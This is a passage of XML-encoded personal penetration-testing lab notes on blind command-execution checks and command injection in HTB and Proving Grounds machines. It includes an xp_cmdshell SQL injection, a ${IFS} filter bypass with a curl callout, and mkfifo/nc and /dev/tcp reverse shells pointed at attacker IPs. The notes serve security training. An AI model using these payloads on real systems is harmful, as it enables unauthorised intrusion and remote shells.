        <w:t xml:space="preserve">sudo tcpdump -ni tun0 icmp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(same as command above but with the -n flag)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1295"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells tcpdump not to resolve hostnames or service names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1295"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without -n, tcpdump tries to resolve IP addresses to domain names (using DNS) and port numbers to service names (like showing echo instead of port 7).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1295"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With -n, you get raw IP addresses and port numbers, which is faster and avoids extra network noise.</w:t>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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_68m31gv10nms" w:id="117"/>
      <w:bookmarkEnd w:id="117"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to send pings to Kali from target machine to check if you have command execution blindly (using tcpdump)</w:t>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t xml:space="preserve">In the MedTech Challenge Lab, we got blind sql injection, but since it's blind we had no way of checking if our command execution worked, so we can use this technique to ping out kali and see if we can execute commands and also to see if victim can access our kali IP</w:t>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t xml:space="preserve">On Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only accept icmp (ping) packets</w:t>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t xml:space="preserve">On victim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -n 3 192.168.45.232</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n 3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means ping 3 times</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if you have SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC xp_cmdshell 'ping -n 3 192.168.45.232';--</w:t>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t xml:space="preserve">Another way of doing this is as below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 src 192.168.209.52</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as above but with a filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">src 192.168.209.52 → only capture packets where the source IP is 192.168.209.52 (target machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This can capture any protocol, not just ICMP, unless you add icmp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 4 192.168.49.209</w:t>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60">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z6fjrw8402iy" w:id="118"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injections</w:t>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hyperlink r:id="rId290">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a list of techniques to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId291">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sii98c6883yp" w:id="119"/>
      <w:bookmarkEnd w:id="119"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the ; (semicolon) for command injection</w:t>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t xml:space="preserve">The most simple command injection is something like: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if it's like a CTF, you can try the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's a HTB, you can do a payload for a reverse shell (look below)</w:t>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t xml:space="preserve">Here is one example of Command Injection (found from </w:t>
      </w:r>
      <w:hyperlink r:id="rId292">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shakabrah</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw the URL had an argument </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10/?host=127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which was used to specify the target to ping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then we just tried command injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10/?host=127.0.0.1;id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked (the website displayed the ping as well as the id)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then executed a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc 192.168.45.162 80 &gt;/tmp/f.</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CozyHosting HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we learned how to do command injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It asked for a username, so gave it a username but then injected another command. For example, we want the username "test", so we did:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D78">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D79">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 7000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test;curl${IFS}http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.16.4:7000;</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And here, the input field didn't allow spaces so we used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">${IFS}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked, we got a response on the python listener. So then, we can try getting a reverse shell.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -e '#!/bin/bash\nsh -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;IP&gt;/&lt;PORT&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0&gt;&amp;1' &gt; rev.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option in the echo command in Linux enables the interpretation of backslash escape sequences within the string being echoed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a comment and then it's followed by /n to make a new line. The comment here is called a shebang and the shebang ensures the script is interpreted by the correct shell (Bash in this case). Without it, the system might use the default shell (often /bin/sh), which might not support all Bash-specific syntax.</w:t>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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 4444</w:t>
      </w:r>
    </w:p>
